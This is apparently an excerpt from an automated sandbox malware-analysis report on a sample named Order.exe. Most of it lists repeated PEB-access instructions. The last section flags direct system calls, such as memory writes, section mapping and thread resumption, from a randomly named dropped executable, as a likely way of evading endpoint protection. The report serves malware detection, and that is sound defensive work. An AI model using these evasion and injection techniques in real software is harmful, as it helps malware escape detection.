                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C0710 mov eax, dword ptr fs:[00000030h]9_2_019C0710
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F0710 mov eax, dword ptr fs:[00000030h]9_2_019F0710
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3C730 mov eax, dword ptr fs:[00000030h]9_2_01A3C730
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC700 mov eax, dword ptr fs:[00000030h]9_2_019FC700
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F273C mov eax, dword ptr fs:[00000030h]9_2_019F273C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F273C mov ecx, dword ptr fs:[00000030h]9_2_019F273C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F273C mov eax, dword ptr fs:[00000030h]9_2_019F273C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC720 mov eax, dword ptr fs:[00000030h]9_2_019FC720
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC720 mov eax, dword ptr fs:[00000030h]9_2_019FC720
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C0750 mov eax, dword ptr fs:[00000030h]9_2_019C0750
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F674D mov esi, dword ptr fs:[00000030h]9_2_019F674D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F674D mov eax, dword ptr fs:[00000030h]9_2_019F674D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F674D mov eax, dword ptr fs:[00000030h]9_2_019F674D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C8770 mov eax, dword ptr fs:[00000030h]9_2_019C8770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0770 mov eax, dword ptr fs:[00000030h]9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02750 mov eax, dword ptr fs:[00000030h]9_2_01A02750
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02750 mov eax, dword ptr fs:[00000030h]9_2_01A02750
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A44755 mov eax, dword ptr fs:[00000030h]9_2_01A44755
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4E75D mov eax, dword ptr fs:[00000030h]9_2_01A4E75D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4690 mov eax, dword ptr fs:[00000030h]9_2_019C4690
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4690 mov eax, dword ptr fs:[00000030h]9_2_019C4690
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F66B0 mov eax, dword ptr fs:[00000030h]9_2_019F66B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC6A6 mov eax, dword ptr fs:[00000030h]9_2_019FC6A6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]9_2_01A3E6F2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]9_2_01A3E6F2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]9_2_01A3E6F2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]9_2_01A3E6F2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A406F1 mov eax, dword ptr fs:[00000030h]9_2_01A406F1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A406F1 mov eax, dword ptr fs:[00000030h]9_2_01A406F1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA6C7 mov ebx, dword ptr fs:[00000030h]9_2_019FA6C7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA6C7 mov eax, dword ptr fs:[00000030h]9_2_019FA6C7
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D260B mov eax, dword ptr fs:[00000030h]9_2_019D260B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D260B mov eax, dword ptr fs:[00000030h]9_2_019D260B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D260B mov eax, dword ptr fs:[00000030h]9_2_019D260B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D260B mov eax, dword ptr fs:[00000030h]9_2_019D260B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D260B mov eax, dword ptr fs:[00000030h]9_2_019D260B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D260B mov eax, dword ptr fs:[00000030h]9_2_019D260B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D260B mov eax, dword ptr fs:[00000030h]9_2_019D260B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E609 mov eax, dword ptr fs:[00000030h]9_2_01A3E609
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C262C mov eax, dword ptr fs:[00000030h]9_2_019C262C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02619 mov eax, dword ptr fs:[00000030h]9_2_01A02619
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE627 mov eax, dword ptr fs:[00000030h]9_2_019DE627
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F6620 mov eax, dword ptr fs:[00000030h]9_2_019F6620
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F8620 mov eax, dword ptr fs:[00000030h]9_2_019F8620
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8866E mov eax, dword ptr fs:[00000030h]9_2_01A8866E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8866E mov eax, dword ptr fs:[00000030h]9_2_01A8866E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DC640 mov eax, dword ptr fs:[00000030h]9_2_019DC640
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F2674 mov eax, dword ptr fs:[00000030h]9_2_019F2674
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA660 mov eax, dword ptr fs:[00000030h]9_2_019FA660
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA660 mov eax, dword ptr fs:[00000030h]9_2_019FA660
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A489B3 mov esi, dword ptr fs:[00000030h]9_2_01A489B3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A489B3 mov eax, dword ptr fs:[00000030h]9_2_01A489B3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A489B3 mov eax, dword ptr fs:[00000030h]9_2_01A489B3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C09AD mov eax, dword ptr fs:[00000030h]9_2_019C09AD
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C09AD mov eax, dword ptr fs:[00000030h]9_2_019C09AD
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D29A0 mov eax, dword ptr fs:[00000030h]9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4E9E0 mov eax, dword ptr fs:[00000030h]9_2_01A4E9E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA9D0 mov eax, dword ptr fs:[00000030h]9_2_019CA9D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA9D0 mov eax, dword ptr fs:[00000030h]9_2_019CA9D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA9D0 mov eax, dword ptr fs:[00000030h]9_2_019CA9D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA9D0 mov eax, dword ptr fs:[00000030h]9_2_019CA9D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA9D0 mov eax, dword ptr fs:[00000030h]9_2_019CA9D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA9D0 mov eax, dword ptr fs:[00000030h]9_2_019CA9D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F49D0 mov eax, dword ptr fs:[00000030h]9_2_019F49D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A569C0 mov eax, dword ptr fs:[00000030h]9_2_01A569C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F29F9 mov eax, dword ptr fs:[00000030h]9_2_019F29F9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F29F9 mov eax, dword ptr fs:[00000030h]9_2_019F29F9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8A9D3 mov eax, dword ptr fs:[00000030h]9_2_01A8A9D3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8918 mov eax, dword ptr fs:[00000030h]9_2_019B8918
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8918 mov eax, dword ptr fs:[00000030h]9_2_019B8918
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4892A mov eax, dword ptr fs:[00000030h]9_2_01A4892A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A5892B mov eax, dword ptr fs:[00000030h]9_2_01A5892B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E908 mov eax, dword ptr fs:[00000030h]9_2_01A3E908
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E908 mov eax, dword ptr fs:[00000030h]9_2_01A3E908
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4C912 mov eax, dword ptr fs:[00000030h]9_2_01A4C912
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0096E mov eax, dword ptr fs:[00000030h]9_2_01A0096E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0096E mov edx, dword ptr fs:[00000030h]9_2_01A0096E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0096E mov eax, dword ptr fs:[00000030h]9_2_01A0096E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4C97C mov eax, dword ptr fs:[00000030h]9_2_01A4C97C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A64978 mov eax, dword ptr fs:[00000030h]9_2_01A64978
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A64978 mov eax, dword ptr fs:[00000030h]9_2_01A64978
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A40946 mov eax, dword ptr fs:[00000030h]9_2_01A40946
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94940 mov eax, dword ptr fs:[00000030h]9_2_01A94940
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E6962 mov eax, dword ptr fs:[00000030h]9_2_019E6962
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E6962 mov eax, dword ptr fs:[00000030h]9_2_019E6962
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E6962 mov eax, dword ptr fs:[00000030h]9_2_019E6962
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C0887 mov eax, dword ptr fs:[00000030h]9_2_019C0887
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4C89D mov eax, dword ptr fs:[00000030h]9_2_01A4C89D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8A8E4 mov eax, dword ptr fs:[00000030h]9_2_01A8A8E4
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EE8C0 mov eax, dword ptr fs:[00000030h]9_2_019EE8C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC8F9 mov eax, dword ptr fs:[00000030h]9_2_019FC8F9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FC8F9 mov eax, dword ptr fs:[00000030h]9_2_019FC8F9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A908C0 mov eax, dword ptr fs:[00000030h]9_2_01A908C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6483A mov eax, dword ptr fs:[00000030h]9_2_01A6483A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6483A mov eax, dword ptr fs:[00000030h]9_2_01A6483A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E2835 mov eax, dword ptr fs:[00000030h]9_2_019E2835
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E2835 mov eax, dword ptr fs:[00000030h]9_2_019E2835
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E2835 mov eax, dword ptr fs:[00000030h]9_2_019E2835
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E2835 mov ecx, dword ptr fs:[00000030h]9_2_019E2835
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E2835 mov eax, dword ptr fs:[00000030h]9_2_019E2835
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E2835 mov eax, dword ptr fs:[00000030h]9_2_019E2835
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FA830 mov eax, dword ptr fs:[00000030h]9_2_019FA830
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4C810 mov eax, dword ptr fs:[00000030h]9_2_01A4C810
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4859 mov eax, dword ptr fs:[00000030h]9_2_019C4859
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C4859 mov eax, dword ptr fs:[00000030h]9_2_019C4859
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F0854 mov eax, dword ptr fs:[00000030h]9_2_019F0854
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A56870 mov eax, dword ptr fs:[00000030h]9_2_01A56870
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A56870 mov eax, dword ptr fs:[00000030h]9_2_01A56870
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4E872 mov eax, dword ptr fs:[00000030h]9_2_01A4E872
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4E872 mov eax, dword ptr fs:[00000030h]9_2_01A4E872
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D2840 mov ecx, dword ptr fs:[00000030h]9_2_019D2840
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A74BB0 mov eax, dword ptr fs:[00000030h]9_2_01A74BB0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A74BB0 mov eax, dword ptr fs:[00000030h]9_2_01A74BB0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0BBE mov eax, dword ptr fs:[00000030h]9_2_019D0BBE
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0BBE mov eax, dword ptr fs:[00000030h]9_2_019D0BBE
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C0BCD mov eax, dword ptr fs:[00000030h]9_2_019C0BCD
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C0BCD mov eax, dword ptr fs:[00000030h]9_2_019C0BCD
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C0BCD mov eax, dword ptr fs:[00000030h]9_2_019C0BCD
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4CBF0 mov eax, dword ptr fs:[00000030h]9_2_01A4CBF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E0BCB mov eax, dword ptr fs:[00000030h]9_2_019E0BCB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E0BCB mov eax, dword ptr fs:[00000030h]9_2_019E0BCB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E0BCB mov eax, dword ptr fs:[00000030h]9_2_019E0BCB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EEBFC mov eax, dword ptr fs:[00000030h]9_2_019EEBFC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C8BF0 mov eax, dword ptr fs:[00000030h]9_2_019C8BF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C8BF0 mov eax, dword ptr fs:[00000030h]9_2_019C8BF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C8BF0 mov eax, dword ptr fs:[00000030h]9_2_019C8BF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6EBD0 mov eax, dword ptr fs:[00000030h]9_2_01A6EBD0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A88B28 mov eax, dword ptr fs:[00000030h]9_2_01A88B28
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A88B28 mov eax, dword ptr fs:[00000030h]9_2_01A88B28
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94B00 mov eax, dword ptr fs:[00000030h]9_2_01A94B00
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3EB1D mov eax, dword ptr fs:[00000030h]9_2_01A3EB1D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EEB20 mov eax, dword ptr fs:[00000030h]9_2_019EEB20
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EEB20 mov eax, dword ptr fs:[00000030h]9_2_019EEB20
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8B50 mov eax, dword ptr fs:[00000030h]9_2_019B8B50
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A68B42 mov eax, dword ptr fs:[00000030h]9_2_01A68B42
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A56B40 mov eax, dword ptr fs:[00000030h]9_2_01A56B40
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A56B40 mov eax, dword ptr fs:[00000030h]9_2_01A56B40
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BCB7E mov eax, dword ptr fs:[00000030h]9_2_019BCB7E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8AB40 mov eax, dword ptr fs:[00000030h]9_2_01A8AB40
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A74B4B mov eax, dword ptr fs:[00000030h]9_2_01A74B4B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A74B4B mov eax, dword ptr fs:[00000030h]9_2_01A74B4B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6EB50 mov eax, dword ptr fs:[00000030h]9_2_01A6EB50
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A92B57 mov eax, dword ptr fs:[00000030h]9_2_01A92B57
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A92B57 mov eax, dword ptr fs:[00000030h]9_2_01A92B57
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A92B57 mov eax, dword ptr fs:[00000030h]9_2_01A92B57
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A92B57 mov eax, dword ptr fs:[00000030h]9_2_01A92B57
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A16AA4 mov eax, dword ptr fs:[00000030h]9_2_01A16AA4
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F8A90 mov edx, dword ptr fs:[00000030h]9_2_019F8A90
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CEA80 mov eax, dword ptr fs:[00000030h]9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94A80 mov eax, dword ptr fs:[00000030h]9_2_01A94A80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C8AA0 mov eax, dword ptr fs:[00000030h]9_2_019C8AA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C8AA0 mov eax, dword ptr fs:[00000030h]9_2_019C8AA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C0AD0 mov eax, dword ptr fs:[00000030h]9_2_019C0AD0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F4AD0 mov eax, dword ptr fs:[00000030h]9_2_019F4AD0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F4AD0 mov eax, dword ptr fs:[00000030h]9_2_019F4AD0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A16ACC mov eax, dword ptr fs:[00000030h]9_2_01A16ACC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A16ACC mov eax, dword ptr fs:[00000030h]9_2_01A16ACC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A16ACC mov eax, dword ptr fs:[00000030h]9_2_01A16ACC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FAAEE mov eax, dword ptr fs:[00000030h]9_2_019FAAEE
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FAAEE mov eax, dword ptr fs:[00000030h]9_2_019FAAEE
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FCA38 mov eax, dword ptr fs:[00000030h]9_2_019FCA38
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E4A35 mov eax, dword ptr fs:[00000030h]9_2_019E4A35
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E4A35 mov eax, dword ptr fs:[00000030h]9_2_019E4A35
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EEA2E mov eax, dword ptr fs:[00000030h]9_2_019EEA2E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4CA11 mov eax, dword ptr fs:[00000030h]9_2_01A4CA11
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019FCA24 mov eax, dword ptr fs:[00000030h]9_2_019FCA24
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0A5B mov eax, dword ptr fs:[00000030h]9_2_019D0A5B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0A5B mov eax, dword ptr fs:[00000030h]9_2_019D0A5B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6EA60 mov eax, dword ptr fs:[00000030h]9_2_01A6EA60
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C6A50 mov eax, dword ptr fs:[00000030h]9_2_019C6A50
                Source: C:\Users\user\Desktop\Order.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
